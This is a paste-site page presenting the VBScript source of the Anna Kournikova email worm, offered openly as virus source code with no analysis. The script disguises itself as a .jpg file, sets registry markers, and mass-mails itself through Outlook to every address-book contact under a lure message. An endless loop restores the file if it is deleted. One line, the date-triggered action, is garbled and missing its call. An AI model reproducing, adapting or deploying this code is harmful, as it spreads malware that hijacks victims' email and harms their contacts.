
Anni Kournikova Virus Source Code

Feb 28th, 2023
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VBScript 1.73 KB | Cybersecurity | 0 0
  1. 'Vbs.OnTheFly Created By OnTheFly
  2. On Error Resume Next
  3. Set WScriptShell= CreateObject("WScript.Shell")
  4. WScriptShell.regwrite "HKCU\software\OnTheFly\", "Worm made with Vbswg 1.50b"
  5. Set FileSystemObject=Createobject("scripting.filesystemobject")
  6. FileSystemObject.copyfile wscript.scriptfullname,FileSystemObject.GetSpecialFolder(0) &
  7. "\AnnaKournikova.jpg.vbs"
  8. if WScriptShell.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
  9. doMail()
  10. end if
  11. if month(now)=1 and day(now)=26 then
  12. "Http://",3,false
  13. end if
  14. Set thisScript=FileSystemObject.opentextfile(wscript.scriptfullname, 1)
  15. thisScriptText=thisScript.readall
  16. thisScript.Close
  17. Do
  18. If Not (FileSystemObject.fileexists(wscript.scriptfullname)) Then
  19. Set newFile=FileSystemObject.createtextfile(wscript.scriptfullname, True)
  20. newFile.write thisScriptText
  21. newFile.Close
  22. End If
  23. Loop
  24. Function doMail()
  25. On Error Resume Next
  26. Set OutlookApp=CreateObject("Outlook.Application")
  27. If OutlookApp="Outlook" Then
  28. Set MAPINameSpace=OutlookApp.GetNameSpace("MAPI")
  29. Set AddressLists=MAPINameSpace.AddressLists
  30. For Each address In AddressLists
  31. If address.AddressEntries.Count <> 0 Then
  32. entryCount=address.AddressEntries.Count
  33. For i=1 To entryCount
  34. Set newItem=OutlookApp.CreateItem(0)
  35. Set currentAddress=address.AddressEntries(i)
  36. newItem.To=currentAddress.Address
  37. newItem.Subject="Here you have, ;o)"
  38. newItem.Body="Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
  39. set attachments=newItem.Attachments
  40. attachments.Add FileSystemObject.GetSpecialFolder(0) & "\AnnaKournikova.jpg.vbs"
  41. newItem.DeleteAfterSubmit=True
  42. If newItem.To <> "" Then
  43. newItem.Send
  44. WScriptShell.regwrite "HKCU\software\OnTheFly\mailed", "1"
  45. End If
  46. Next
  47. End If
  48. Next
  49. end if
  50. End Function
  51. 'Vbswg 1.50b
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